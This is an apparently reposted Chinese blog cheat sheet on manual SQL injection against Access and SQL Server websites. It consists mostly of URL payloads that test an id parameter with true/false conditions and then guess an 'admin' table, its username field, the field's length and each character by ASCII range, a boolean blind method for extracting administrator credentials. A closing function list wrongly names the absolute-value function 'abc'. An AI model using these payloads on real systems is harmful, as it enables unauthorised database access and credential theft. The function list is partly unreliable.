手工检测可否注入

最新推荐文章于 2025-12-18 10:59:28 发布

原创最新推荐文章于 2025-12-18 10:59:28 发布 · 1.1k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sqlserver #access #数据库 #c

精典文章专栏收录该内容

153 篇文章

订阅专栏

文章介绍了数据库注入的检测方法，包括检测可否注入、表段、字段、ID、长度等，还介绍了检测是否为MSSQL数据库、是否为英文及英文范围等方法。同时列举了Access和SQL Server的常用函数，如返回字符ASCII码、根据ASCII码返回字符等函数。

文章出处:http://blog.powers.com.cn/forum_posts.asp?TID=333&PN=4
文章作者:yjd

□ 检测可否注入
============================================================ ==================
http://url/xx?id=1111 and 1=1 (正常页面)
http://url/xx?id=1111 and 1=2 (出错页面)

============================================================ ==================
□ 检测表段的
============================================================ ==================
http://url/xx?id=1111 and exists (select * from admin)

============================================================ ==================
□ 检测字段的
============================================================ ==================
http://url/xx?id=1111 and exists (select username from admin)

============================================================ ==================
□ 检测ID
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where ID=1)

============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)

============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)

============================================================ ==================
□ 检测是否为MSSQL数据库
============================================================ ==================
http://url/xx?id=1111 and exists (select * from sysobjects)

============================================================ ==================
□ 检测是否为英文
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

============================================================ ==================
□ 检测英文的范围
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

============================================================ ==================
□ 检测那个字符
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

============================================================ ===================
常用函数
============================================================ ===================
Access：asc(字符)　SQLServer：unicode(字符)
作用：返回某字符的ASCII码

Access：chr(数字)　SQLServer：nchar(数字)
作用：与asc相反，根据ASCII码返回字符

Access：mid(字符串,N,L)　SQLServer：substring(字符串,N,L)
作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串

Access：abc(数字)　SQLServer：abc (数字)
作用：返回数字的绝对值（在猜解汉字的时候会用到）

Access：A between B And C　SQLServer：A between B And C
作用：判断A是否界于B与C之间